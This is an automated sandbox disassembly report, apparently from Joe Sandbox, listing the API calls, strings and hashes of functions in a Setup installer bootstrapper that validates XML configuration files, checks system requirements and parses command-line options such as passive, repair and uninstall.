                                                                                              • GetCommandLineW.KERNEL32(?,?,?,?,?,ParameterInfo.xml,?,00000000,?,?,ParameterInfo.xml,?,?,00000738,6C8FFA6E,?), ref: 6C90B51F
                                                                                                • Part of subcall function 6C8C838A: __EH_prolog3.LIBCMT ref: 6C8C8391
                                                                                                • Part of subcall function 6C8CA378: __EH_prolog3.LIBCMT ref: 6C8CA37F
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C90B50F
                                                                                                • Part of subcall function 6C9214AA: KiUserExceptionDispatcher.NTDLL(?,?,6C91C129,00000C00,?,?,?,?,6C91C129,00000C00,6C93BA3C,6C9576D4,00000C00,00000020,6C8FF845,?), ref: 6C9214EC
                                                                                                • Part of subcall function 6C8C3A16: __EH_prolog3.LIBCMT ref: 6C8C3A1D
                                                                                              • GetThreadLocale.KERNEL32(?,passive,00000000), ref: 6C90B6C8
                                                                                                • Part of subcall function 6C8F7889: __EH_prolog3.LIBCMT ref: 6C8F7890
                                                                                                • Part of subcall function 6C8F7DB0: __EH_prolog3.LIBCMT ref: 6C8F7DB7
                                                                                                • Part of subcall function 6C8F7C9E: __EH_prolog3.LIBCMT ref: 6C8F7CA5
                                                                                                • Part of subcall function 6C8F7E78: __EH_prolog3.LIBCMT ref: 6C8F7E7F
                                                                                                • Part of subcall function 6C8C43C4: __EH_prolog3.LIBCMT ref: 6C8C43CB
                                                                                                • Part of subcall function 6C8C5E41: __EH_prolog3.LIBCMT ref: 6C8C5E48
                                                                                                • Part of subcall function 6C8C5E41: PathFindFileNameW.SHLWAPI(?,?,?,0000000C,6C8C5E13,?,6C8F831D,?,0000000C,6C8C7D3D,?,00000000,?,?,6C8BAB18,00000008), ref: 6C8C5E83
                                                                                                • Part of subcall function 6C8C5E41: PathFindExtensionW.SHLWAPI(?), ref: 6C8C5EA0
                                                                                                • Part of subcall function 6C8F6DCB: GetCommandLineW.KERNEL32(38D98A99,?,?,00000000,?,?,?,?,?,ParameterInfo.xml,?,?,?,00000000,?,?), ref: 6C8F6E16
                                                                                                • Part of subcall function 6C8F594B: __EH_prolog3.LIBCMT ref: 6C8F5952
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,OneInstance,?,00000000,?,ParameterInfo.xml,?,?,00000738,6C8FFA6E,?,6C8BA794,02F92298), ref: 6C90BED4
                                                                                                • Part of subcall function 6C8FAE4A: __EH_prolog3.LIBCMT ref: 6C8FAE51
                                                                                              • CloseHandle.KERNEL32(?,?,00000000,?,00000001,00000007,?,OneInstance,?,?,00000000,?,?,?,?,?), ref: 6C90BE22
                                                                                                • Part of subcall function 6C8E6F61: __EH_prolog3.LIBCMT ref: 6C8E6F68
                                                                                                • Part of subcall function 6C8FBE94: _free.LIBCMT ref: 6C8FBEBC
                                                                                                • Part of subcall function 6C8FBE94: _free.LIBCMT ref: 6C8FBECD
                                                                                              • CloseHandle.KERNEL32(?), ref: 6C90BF2E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$Path$CloseCommandException@8FileH_prolog3_catchHandleLineThrow$FindInitializeNameRelativeThread_free$CreateDispatcherExceptionExistsExtensionFreeLocaleModuleReadStringUser
                                                                                              • String ID: !$#(loc.ids_wer_message)$%TEMP%\$Blocker$Command-line option error: $CreateFilesInUser$CreateHelpUsage$CreateUiMode$FactoryInitialization$InvalidArguments$OneInstance$PISemanticChecker$ParameterInfo.xml$Parameterinfo.xml or UiInfo.xml has a #Loc that is not defined in LocalizeData.xml $W$passive
                                                                                              • API String ID: 5912831-280204926
                                                                                              • Opcode ID: 5d9db8bb0ec6777c420896c18ba0bdd36d5b6dfb54068ee98168eb6e196aaba1
                                                                                              • Instruction ID: 8cd951a7dd3585bc667bf864ada0fab9d9ca7eaa443a7ad30a48cbecb3fe1b66
                                                                                              • Opcode Fuzzy Hash: 5d9db8bb0ec6777c420896c18ba0bdd36d5b6dfb54068ee98168eb6e196aaba1
                                                                                              • Instruction Fuzzy Hash: 05E2797190025CDFCF21DFA8C944ADDBBB9AF19318F148599E418B7791CB30AA89CF61

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63966981
                                                                                                • Part of subcall function 63951E75: __EH_prolog3.LIBCMT ref: 63951E7C
                                                                                                • Part of subcall function 63951E75: GetThreadLocale.KERNEL32(?,00000004,63956734,0000004C,0000004C,63957142,?,00000000), ref: 63951E8E
                                                                                              • CoCreateInstance.OLE32(63947980,00000000,00000017,63947970,?,?,00000068,639665A6,?,?,?,?,63962A30,?,00000000,?), ref: 639669AC
                                                                                              • PathIsRelativeW.SHLWAPI(?,?,?,?,?,?,?,63962A30,?,00000000,?,00000000,00000000,?,?,00000000), ref: 63966A7F
                                                                                              • PathFileExistsW.KERNELBASE(?,?,?,?,?,63962A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,6395E271), ref: 63966A8C
                                                                                              • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,63962A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008), ref: 63966ABE
                                                                                              • PathFileExistsW.SHLWAPI(?,?,?,?,?,63962A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,6395E271), ref: 63966AC1
                                                                                              • CoCreateInstance.OLE32(63947990,00000000,00000017,639479A0,?), ref: 63966B4C
                                                                                                • Part of subcall function 6394C98C: GetThreadLocale.KERNEL32 ref: 6394C999
                                                                                                • Part of subcall function 6394B93E: __EH_prolog3.LIBCMT ref: 6394B945
                                                                                                • Part of subcall function 6395F21D: PathAppendW.SHLWAPI(00000000,00000000,?,00000105,?,?,80070057,80070057,6394C3AE), ref: 6395F241
                                                                                              • VariantClear.OLEAUT32(?), ref: 63966BBD
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                              • PathIsRelativeW.SHLWAPI(?,?), ref: 63966BE8
                                                                                              • PathFileExistsW.SHLWAPI(?), ref: 63966BF5
                                                                                              • PathFileExistsW.KERNELBASE(?,?), ref: 63966C27
                                                                                              • PathFileExistsW.KERNELBASE(?), ref: 63966C2A
                                                                                              • VariantClear.OLEAUT32(?), ref: 63966C8E
                                                                                              • __CxxThrowException@8.LIBCMT ref: 63966CAB
                                                                                              • VariantClear.OLEAUT32(?), ref: 63966CED
                                                                                              • VariantClear.OLEAUT32(?), ref: 63966DE9
                                                                                                • Part of subcall function 6394CA39: __EH_prolog3.LIBCMT ref: 6394CA40
                                                                                              Strings
                                                                                              • http://schemas.microsoft.com/SetupUI/2008/01/imui, xrefs: 63966C7A
                                                                                              • ^wu, xrefs: 63966A8C, 63966BF5
                                                                                              • Stopping XML schema validation of UI information and continuing, xrefs: 639669FA, 63966B9A
                                                                                              • Add to schema collection schema file - %s, xrefs: 63966C4D
                                                                                              • Validation FAILED Reason:%s, xrefs: 63966D5F
                                                                                              • CoCreateInstance of XMLSchemaCache60 failed with hr = 0x%x (%s), xrefs: 63966B7C
                                                                                              • UIInfo.xml, xrefs: 63966D8C, 63966EC3
                                                                                              • Loading file - %s, xrefs: 63966AF3
                                                                                              • Validation FAILED Err on line: %d @column: %dReason:%s SrcText:%s, xrefs: 63966E8B
                                                                                              • CoCreateInstance of DOMDocument60 failed with hr = 0x%x (%s), xrefs: 639669DC
                                                                                              • UiInfo.xml, xrefs: 63966A65
                                                                                              • SetupUi.xsd, xrefs: 63966BD7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Path$ExistsFile$H_prolog3$ClearVariant$CreateInstanceLocaleRelativeThread$AppendException@8Throw
                                                                                              • String ID: Validation FAILED Reason:%s$Validation FAILED Err on line: %d @column: %dReason:%s SrcText:%s$Add to schema collection schema file - %s$CoCreateInstance of DOMDocument60 failed with hr = 0x%x (%s)$CoCreateInstance of XMLSchemaCache60 failed with hr = 0x%x (%s)$Loading file - %s$SetupUi.xsd$Stopping XML schema validation of UI information and continuing$UIInfo.xml$UiInfo.xml$http://schemas.microsoft.com/SetupUI/2008/01/imui$^wu
                                                                                              • API String ID: 3881019808-1965720155
                                                                                              • Opcode ID: e8a044614c746befe8d70f51de014bb908052a8ffa0293970dec286d3ae47222
                                                                                              • Instruction ID: 2da4ac5b64a3baad79b96c9a960ec5711e37c0604bea002b5ac38ec2f571ab2f
                                                                                              • Opcode Fuzzy Hash: e8a044614c746befe8d70f51de014bb908052a8ffa0293970dec286d3ae47222
                                                                                              • Instruction Fuzzy Hash: 940237B1D01249EFDF00DBE8C944ADDBBB8AF5A718F244598E510BB242D735EA05CF61

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63952B1B
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                                • Part of subcall function 6394D76F: __EH_prolog3.LIBCMT ref: 6394D776
                                                                                                • Part of subcall function 6394D76F: SysFreeString.OLEAUT32(00000000), ref: 6394D7CA
                                                                                              • PathIsRelativeW.SHLWAPI(?,00000001,?,000000FF,?,?,?,?,00000001,?,?,?,000000FF,00000088,63966F88,?), ref: 63952D9C
                                                                                              • PathFileExistsW.SHLWAPI(?,?,?,?,63962A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,6395E271,00000000), ref: 63952DAF
                                                                                              • PathFileExistsW.KERNELBASE(00000005,?,?,?,?,?,63962A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008), ref: 63952DF0
                                                                                              • PathFileExistsW.KERNELBASE(00000005,?,?,?,63962A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,6395E271,00000000), ref: 63952E0F
                                                                                              • PathIsRelativeW.SHLWAPI(00000001,?,?,?,63962A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,6395E271,00000000), ref: 63952E2F
                                                                                              • PathFileExistsW.SHLWAPI(00000001,?,?,?,63962A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,6395E271,00000000), ref: 63952E40
                                                                                              • __CxxThrowException@8.LIBCMT ref: 63952EBB
                                                                                              • PathFileExistsW.KERNELBASE(00000005,00000001,?,?,?,?,63962A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008), ref: 63952EEF
                                                                                                • Part of subcall function 6395F21D: PathAppendW.SHLWAPI(00000000,00000000,?,00000105,?,?,80070057,80070057,6394C3AE), ref: 6395F241
                                                                                              • PathFileExistsW.KERNELBASE(00000005,?,?,?,63962A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,6395E271,00000000), ref: 63952F0E
                                                                                                • Part of subcall function 639683FD: _memcpy_s.LIBCMT ref: 6396844E
                                                                                              • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,?,?,?,63962A30,?,00000000,?,00000000,00000000,?,?,00000000), ref: 6395309C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Path$ExistsFile$H_prolog3$Relative$AppendExceptionException@8FreeRaiseStringThrow_memcpy_s
                                                                                              • String ID: %$Caption$CreateLayout$Default$HeaderImage$Install$Repair$Uninstall$UninstallPatch$Watermark$WizardImages$^wu
                                                                                              • API String ID: 2164894574-1264716263
                                                                                              • Opcode ID: 78df54d37d0785e3c9e29d5ae4c5a36563b5931243fd3a55c34b4e8a807d74f8
                                                                                              • Instruction ID: 9395950c5b37c4e1dd48bcde6f9f779218b9d9e128e4a8d46298c3289b4c79c0
                                                                                              • Opcode Fuzzy Hash: 78df54d37d0785e3c9e29d5ae4c5a36563b5931243fd3a55c34b4e8a807d74f8
                                                                                              • Instruction Fuzzy Hash: 35124C7180424DEFDF00DFA8C984ADDBBB8AF1A728F148155F464AB281D734DA59CF61

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 6C9009ED
                                                                                                • Part of subcall function 6C8C5727: GetModuleHandleW.KERNEL32(kernel32.dll,?,6C8C5782,00000000,6C8F831D), ref: 6C8C5731
                                                                                                • Part of subcall function 6C8C5727: GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 6C8C5741
                                                                                              • GetLastError.KERNEL32 ref: 6C900A27
                                                                                              • GetLastError.KERNEL32 ref: 6C900A82
                                                                                              • RegOpenKeyExW.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020019,?,?,00000000,?,Failed to record NumberOfProcessor), ref: 6C900ADE
                                                                                              • RegQueryValueExW.KERNEL32(?,~MHz,00000000,00000000,?,?), ref: 6C900B0D
                                                                                              • RegQueryValueExW.ADVAPI32(?,~Mhz,00000000,00000000,?,?), ref: 6C900B2D
                                                                                              • RegQueryValueExW.ADVAPI32(?,~mhz,00000000,00000000,?,?), ref: 6C900B4D
                                                                                              • RegCloseKey.KERNEL32(?), ref: 6C900B55
                                                                                              • GetLastError.KERNEL32 ref: 6C900B75
                                                                                              • _memset.LIBCMT ref: 6C900BCC
                                                                                              • GlobalMemoryStatusEx.KERNEL32(?,?,?,6C8BA738,?,?,00000738,6C8FFA6E,?,6C8BA794,02F92298), ref: 6C900BEA
                                                                                              • GetLastError.KERNEL32(?,?,00000738,6C8FFA6E,?,6C8BA794,02F92298), ref: 6C900C15
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                              • GetLastError.KERNEL32(?,GlobalMemoryStatusEx failed,?,?,00000738,6C8FFA6E,?,6C8BA794,02F92298), ref: 6C900C60
                                                                                                • Part of subcall function 6C901236: __EH_prolog3.LIBCMT ref: 6C90123D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$QueryValue$H_prolog3$AddressCloseGlobalH_prolog3_HandleMemoryModuleOpenProcStatus_memset
                                                                                              • String ID: Failed to record CpuArchitecture$Failed to record NumberOfProcessor$Failed to record SystemMemory$GlobalMemoryStatusEx failed$HARDWARE\DESCRIPTION\System\CentralProcessor\0$~MHz$~Mhz$~mhz
                                                                                              • API String ID: 2659457873-2309824155
                                                                                              • Opcode ID: 3a5852ab96209497073f853f575c5c17c9880c4eccef9fe62df9df8bfaf414d4
                                                                                              • Instruction ID: 05650480a991b96333a746642ea1cbca141b81da66532ea4c848229f36f3071c
                                                                                              • Opcode Fuzzy Hash: 3a5852ab96209497073f853f575c5c17c9880c4eccef9fe62df9df8bfaf414d4
                                                                                              • Instruction Fuzzy Hash: AB819D32A00248EBDB20CFE5CD45FDEBBB9AF05358F20462AE515EB690D774DA05DB90

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C90D025
                                                                                                • Part of subcall function 6C8C5D3F: __EH_prolog3.LIBCMT ref: 6C8C5D46
                                                                                                • Part of subcall function 6C8C5D3F: GetModuleFileNameW.KERNEL32(6C8A0000,00000010,00000104,?,6C8F831D,00000000), ref: 6C8C5D93
                                                                                                • Part of subcall function 6C8F8E4A: PathAppendW.SHLWAPI(00000000,?,?,?,?,?,6C9099FD,00000000,00000000,?,?,?,00000000,?,UiInfo.xml), ref: 6C8F8E6E
                                                                                              • PathFileExistsW.SHLWAPI(?,6C8B61FC,graphics,?,00000054,6C90B48A,?,?,?,?,ParameterInfo.xml,?,00000000,?,?,ParameterInfo.xml), ref: 6C90D0BE
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C90D16E
                                                                                                • Part of subcall function 6C8F8F73: PathRemoveFileSpecW.SHLWAPI(00000000,2806C750,00000010,80004005,6C8C5DB8,6C8FF845,00000010,?,6C8F831D,00000000), ref: 6C8F8F84
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: FilePath$H_prolog3$AppendException@8ExistsModuleNameRemoveSpecThrow
                                                                                              • String ID: Graphic file %s does not exists$Print.ico$Rotate1.ico$Rotate2.ico$Rotate3.ico$Rotate4.ico$Rotate5.ico$Rotate6.ico$Rotate7.ico$Rotate8.ico$Save.ico$Setup.ico$SysReqMet.ico$SysReqNotMet.ico$graphics$stop.ico$warn.ico
                                                                                              • API String ID: 419085990-1965610755
                                                                                              • Opcode ID: 00a38f29a76d50467e36f4aeed864fb76b272e6fb682117a31388365bc056ce0
                                                                                              • Instruction ID: 21f2e7ff36915f497d4910142499a70467a77325b449ad7df85d1ca9269ada81
                                                                                              • Opcode Fuzzy Hash: 00a38f29a76d50467e36f4aeed864fb76b272e6fb682117a31388365bc056ce0
                                                                                              • Instruction Fuzzy Hash: C04125B29006199BDB24DFE4CA46BDEBB75BF14304FA04819D424BBB50C7309A09CB91

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8DA833
                                                                                                • Part of subcall function 6C8D1D3D: __EH_prolog3.LIBCMT ref: 6C8D1D44
                                                                                                • Part of subcall function 6C8D1D3D: __CxxThrowException@8.LIBCMT ref: 6C8D1E11
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C8DAD1D
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8C838A: __EH_prolog3.LIBCMT ref: 6C8C8391
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$Exception@8Throw
                                                                                              • String ID: <$ActionTable$ApplicableIf$Compressed$Compressed items need to have URL and CompressedDownloadSize authored.$CustomErrorHandling$IsPresent$MSIOptions$MSIRepairOptions$MSIUninstallOptions$ParameterInfo.xml$ProductCode$RepairOverride$UninstallOverride$schema validation failure: MSI, AgileMSI and AgileMSP do not support RepairOverride or UninstallOverride child elements!$schema validation failure: Product Code cannot be emoty.$schema validation failure: wrong number of MSI child nodes!
                                                                                              • API String ID: 2489616738-1903366528
                                                                                              • Opcode ID: fc8567d95ae43713faaa82ea763fdea8feeccebc721f7e16321c0cef9f4bebf4
                                                                                              • Instruction ID: 09d07609f90c74e4324d5dd11093254bcff93e2c5918b438d5e5654f62a14bd0
                                                                                              • Opcode Fuzzy Hash: fc8567d95ae43713faaa82ea763fdea8feeccebc721f7e16321c0cef9f4bebf4
                                                                                              • Instruction Fuzzy Hash: C4426171604249EFDB14CFA8CA44ADE7BB9BF19318F144959F824EB780C734EA09CB61

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8E2589
                                                                                                • Part of subcall function 6C91C0AA: _malloc.LIBCMT ref: 6C91C0C4
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C8E2AB0
                                                                                                • Part of subcall function 6C91C0AA: std::exception::exception.LIBCMT ref: 6C91C0F9
                                                                                                • Part of subcall function 6C91C0AA: std::exception::exception.LIBCMT ref: 6C91C113
                                                                                                • Part of subcall function 6C91C0AA: __CxxThrowException@8.LIBCMT ref: 6C91C124
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Exception@8H_prolog3Throwstd::exception::exception$_malloc
                                                                                              • String ID: ", local path $". Valid types are MSI, MSP, Exe, Patches, ServiceControl and File. Theses are case sensitive.$(not applicable)$Adding Item type "$AgileMSI$CleanupBlock$Exe$File$MSI$MSP$ParameterInfo.xml$Patches$RelatedProducts$ServiceControl$Unknown Item type "$schema validation failure: unknown Item type -
                                                                                              • API String ID: 3439882596-1328758535
                                                                                              • Opcode ID: 10cbe1f0fd6babd481d23fa539f6c3efefd7c86ada9ab7b058b3ec0892b3f958
                                                                                              • Instruction ID: 8e879fc51492ce6bb24c0ab691473a4c0eee75ad6a54020e985a11aa594b8dfa
                                                                                              • Opcode Fuzzy Hash: 10cbe1f0fd6babd481d23fa539f6c3efefd7c86ada9ab7b058b3ec0892b3f958
                                                                                              • Instruction Fuzzy Hash: 61029F7190521CEFCB25DBE8CE45AED7BB4AF1E308F104969E415E7B81CB34DA088B65

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 639561A0
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                                • Part of subcall function 63951E75: __EH_prolog3.LIBCMT ref: 63951E7C
                                                                                                • Part of subcall function 63951E75: GetThreadLocale.KERNEL32(?,00000004,63956734,0000004C,0000004C,63957142,?,00000000), ref: 63951E8E
                                                                                              • PathIsRelativeW.SHLWAPI(?,?,?,0000003C,63967332,?,?,?,?,?,?,?,00000000,?,?,?), ref: 639561E9
                                                                                              • PathFileExistsW.SHLWAPI(?), ref: 639561F6
                                                                                              • PathFileExistsW.KERNELBASE(?,?), ref: 6395622B
                                                                                              • PathFileExistsW.KERNELBASE(?), ref: 63956230
                                                                                              • CoInitialize.OLE32(00000000), ref: 63956299
                                                                                              • CoUninitialize.OLE32(?,?), ref: 63956340
                                                                                              • __CxxThrowException@8.LIBCMT ref: 639563B7
                                                                                              • __EH_prolog3.LIBCMT ref: 639563C9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3Path$ExistsFile$Exception@8InitializeLocaleRelativeThreadThrowUninitialize
                                                                                              • String ID: ' was not found in UiInfo.xml$String for StringID '$Strings$Strings.xml$Successfuly found file %s $UIInfo.xml$^wu
                                                                                              • API String ID: 1923347782-2025596970
                                                                                              • Opcode ID: b5acee74e87d2ad749abed92e28a44c6d976e7c8eea16085ebe9bf5759dc2c04
                                                                                              • Instruction ID: 489f726252fc79028830295c2996886c85020bcfedf992e91676eadc4bd2a038
                                                                                              • Opcode Fuzzy Hash: b5acee74e87d2ad749abed92e28a44c6d976e7c8eea16085ebe9bf5759dc2c04
                                                                                              • Instruction Fuzzy Hash: 79A17C71900209EFDB00DFA8C945BDEBBB8AF16B28F148155F524EB282DB30DA55CF61

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8C3E7E
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8F9067: __EH_prolog3.LIBCMT ref: 6C8F906E
                                                                                                • Part of subcall function 6C8F9067: __recalloc.LIBCMT ref: 6C8F90B0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$__recalloc
                                                                                              • String ID: CEIPconsent$NoSetupVersionCheck$chainingpackage$createlayout$lcid$log$msioptions$norestart$parameterfolder$passive$pipe$promptrestart$repair$serialdownload$showfinalerror$uninstall$uninstallpatch
                                                                                              • API String ID: 1900422986-634121796
